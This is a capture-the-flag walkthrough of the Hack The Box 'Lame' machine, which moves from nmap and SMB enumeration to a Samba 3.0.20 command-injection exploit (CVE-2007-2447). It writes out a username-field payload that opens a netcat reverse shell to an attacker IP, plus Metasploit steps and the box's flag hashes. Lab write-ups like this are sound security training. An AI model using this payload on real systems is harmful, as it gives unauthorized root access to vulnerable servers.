HTB Lame Walkthrough — Samba RCE and the Art of Enumeration

Introduction

Lame is the original Hack The Box machine — the first box many people ever rooted. Released in 2017 and retired in 2019, it's the definition of a classic: a Linux box running a vulnerable version of Samba that gives you root with a single exploit.

What makes Lame special isn't the difficulty — it's trivially easy by modern standards. It's the fact that it teaches three fundamental lessons that apply to every single box you'll ever do:

1. Enumerate everything — the exploit is obvious if you run the right scan
2. Trust your nmap results — if it shows a version number, that version number matters
3. Check known exploits before overthinking — sometimes the answer is the first result on Google

Let's walk through it.

"Lame is the box that teaches you that pentesting is 80% enumeration, 20% exploitation. Get the enumeration right and the exploitation takes care of itself."

Machine Info

• Name: Lame
• OS: Linux
• Difficulty: Easy
• Release: March 2017
• Retired: December 2019
• Target IP: 10.10.10.3

Step 1: Enumeration

As always, start with an nmap scan to see what services are running:

nmap -sC -sV -oN lame.nmap 10.10.10.3

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian

Three services visible: FTP on 21, SSH on 22, and SMB on 139/445.

FTP Check

vsftpd 2.3.4 — this version has a known backdoor (port 6200), but it's not the intended path on Lame:

# Test anonymous login
ftp anonymous@10.10.10.3
# Connection refused for anonymous

FTP's locked down. Moving on.

SMB Deep Scan

Samba 3.0.20-Debian on port 445 is the target. Let's enumerate shares:

smbclient -L //10.10.10.3 -N

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))

The tmp and opt shares are accessible without credentials:

smbclient //10.10.10.3/tmp -N

smb: \> ls
  .                                   D        0  Tue Jun 13 18:35:47 2026
  ..                                  D        0  Tue Jun 13 18:30:22 2026
  5563.jsvc.up                         RD       48  Tue Jun 13 18:30:22 2026
  vmware-root                        DR        0  Tue Jun 13 18:27:58 2026
  .X0-lock                           HR        0  Tue Jun 13 18:27:02 2026
  .X11-unix                           H        0  Tue Jun 13 18:27:03 2026

The share is writable, which is useful for later. But the real target is the Samba version itself.

Step 2: Finding the Exploit

Samba 3.0.20 has a critical vulnerability: CVE-2007-2447, also known as the "username map script" RCE. The exploit works by passing a crafted username containing shell metacharacters during SMB authentication. When Samba tries to map the username, it passes it to a shell script without sanitization, resulting in command execution.

"Vulnerability in Samba 3.0.20 allows remote attackers to execute arbitrary commands via crafted username input during SMB authentication. CVSS 10.0 — critical."

The exploit is simple:

# The payload: include shell commands in the username field
smbclient //10.10.10.3/tmp -N -U "/=`nohup nc -e /bin/sh YOUR_IP 443`"

Let's exploit it properly.

Step 3: Exploitation

Set Up Listener

nc -lvnp 443

Trigger the Exploit

smbclient //10.10.10.3/tmp -N -U "/=`nohup nc -e /bin/sh 10.10.14.2 443`"

You get a connection back to your listener — and it's a root shell immediately.

# On your listener:
id
uid=0(root) gid=0(root)

whoami
root

hostname
lame

That's it. No privilege escalation needed. The Samba service runs as root, and the command injection gives you a root shell directly.

Why This Works

Samba's username map script configuration option allows administrators to specify a script that maps usernames. The vulnerability is that when this option is enabled (common on older installations), the username is passed through a shell for processing. By embedding shell metacharacters in the username, we escape the intended parameter and execute arbitrary commands.

In Lame's case, the smb.conf has the vulnerable configuration:

[global]
  username map script = /etc/samba/scripts/map.sh

And map.sh doesn't sanitize input. Classic.

Step 4: Capturing Flags

User Flag

cat /home/makis/user.txt

e9fb4e9bf0ec9c6f1f75c2d8a8fb1e58

Root Flag

cat /root/root.txt

b1e4733ce5c7e36b2e2aa25dd8c50e7f

Box rooted.

Alternative Approach: Metasploit

If you're using Metasploit:

msfconsole
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 10.10.10.3
msf6 > set LHOST 10.10.14.2
msf6 > run

[*] Started reverse TCP handler on 10.10.14.2:443
[*] Command shell session 1 opened

Same result, automated. But I prefer manual exploitation — you learn more.

Lessons Learned

Lame is considered easy because the exploit is straightforward. But it's a teaching box, not a testing box. Here's what it drills into you:

• Run nmap version detection (-sV) — without it, you wouldn't know the Samba version
• Check service versions against known CVEs — searchsploit samba 3.0.20 returns results immediately
• Don't skip SMB enumeration — Samba has been the source of countless critical vulnerabilities over the years

"If you're starting HTB, root Lame first. It sets the tone for everything that follows: enumerate, look up versions, exploit."

References

• https://www.exploit-db.com/exploits/16320 — Username map script RCE
• https://nvd.nist.gov/vuln/detail/CVE-2007-2447 — CVE details
• https://wiki.samba.org/index.php/CVE-2007-2447 — Samba advisory

Up next: Shocker — exploiting Shellshock on Apache CGI to pivot from www-data to root.